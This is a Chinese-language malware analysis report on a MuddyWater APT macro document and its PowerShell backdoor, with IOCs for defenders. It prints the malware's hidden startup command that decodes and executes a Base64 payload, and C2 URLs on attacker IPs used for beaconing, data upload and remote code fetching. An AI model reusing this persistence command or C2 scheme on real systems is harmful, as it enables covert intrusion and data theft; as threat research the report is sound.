MuddyWater(污水)最新攻擊樣本分析

發布時間 2019-05-10

MuddyWater是一個來自于伊朗的主要針對中東地區進行攻擊的APT組織,其攻擊目標主要集中于政府、電信及能源等領域。

近日,啟明星辰金睛安全研究團隊通過VenusEye威脅情報中心狩獵系統捕獲到一個可疑文檔,經過分析確認其為MuddyWater最新攻擊樣本。


載荷分析


攻擊樣本為一個Word文檔,打開后會顯示如下圖片,誘使受害者啟用宏。


宏代碼執行后,會釋放c:\programdata\SysTextEnc.ini文件。該文件內容為一串Base64編碼數據。

然后向啟動項寫入如下命令行:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

用于開機解密并執行c:\programdata\SysTextEnc.ini文件。解密之后為一段powershell代碼,該代碼用于請求hxxp://38.132.99.167/crf.txt鏈接的數據并執行,該鏈接返回的數據仍然是一段Powershell代碼。
 



木馬分析


上述過程中下載的Powershell代碼即MuddyWater組織慣用的powershell木馬。

解混淆后,其主函數如下所示:


依次執行wlChecul,pmrHlsl,GECOANOO,gfxEcmdascrsltp這四個函數。其中wlChecul只是為了確認服務器準備狀態。構造如下URL并以POST方式發送請求:
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

如果返回值不為空且不為%COPYTHAT%才會執行后續函數。之后執行pmrHlsl函數,該函數會調用WMI獲取多種計算機信息。
 

將獲得的信息使用“*”進行拼接。計算拼接后字符串的MD5,再和“*1997* EP1”進行拼接,最后進行base64編碼。

 
之后將構造出來的Base64編碼數據拼接成如下URL并以POST方式發送出去:
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

如果返回結果不為空并且不為%BYE%則繼續后續函數的執行。接下來要執行的函數為GECOANOO。

GeCOANOO函數構造如下數據,并以POST方式將其發送出去:
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

其中的EncryptedData即上一次發送數據中進行Base64編碼的MD5部分。如果返回結果不為空且返回值經過base64解碼后不為"SHH",則將解碼后的返回值賦值給一個全局變量gecdrEu,然后執行下一個函數,可以判斷賦值給gecdrEu的數據為一段powershell代碼。
 

最后通過gfxEcmdascrsltp函數執行全局變量中的gecdrEu中的powershell代碼。
 

并將返回值進行base64編碼,拼湊成如下的URL格式進行上傳。
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


溯源分析


通過VenusEye威脅情報中心關聯系統,我們發現了另一個早期的樣本。


該樣本所使用的技術都與本次我們發現的樣本如出一轍。

通過溯源分析,我們發現這兩個樣本都與友商4月10日在社交媒體上披露的MuddyWater攻擊土耳其的樣本相似。下面是兩者的宏代碼對比。



通過對比可以發現,二者都使用相同的方式獲取計算機信息,然后使用相同的計算方式計算受害者主機的唯一標識。

 


相比之下,早期發現的樣本將上線請求、獲取powershell代碼、上傳命令行執行結果拆分成不同PHP進行交互。而現在的版本則使用同一個PHP文件進行交互。并且早期版本如果在執行過程中遇到錯誤,則會將錯誤信息記錄日志,但是最新版本則直接結束當前程序。

對于執行流程來說,最新版本相對于早期版本也有較大不同,二者的執行流程如下:



 
相比之下,最新的攻擊活動增加了其基礎設施,并且將主體代碼放置到遠程服務器中而不是直接通過釣魚文檔釋放到本地。可以看出該組織在不斷的更新其攻擊方式和防檢測方式。



總結


MuddyWater組織自披露之初一直活躍至今,該組織非常青睞使用Powershell腳本來編寫其攻擊工具,并衍生出了該組織的專有木馬POWERSTATS。雖然該組織的Powershell木馬更新換代很快,但是我們仍能從其powershell代碼中看到些許POWERSTATS的影子。


威脅指標(IOC)


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


解決方案


1、啟明星辰VenusEye威脅情報中心已經支持對本次攻擊活動相關情報的查詢。

2、 已部署啟明星辰IDS、IPS產品的客戶請升級事件庫到最新版本,即可有效檢測或阻斷攻擊。

3、 已部署啟明星辰APT檢測產品的客戶無需升級,即可有效檢測此次攻擊。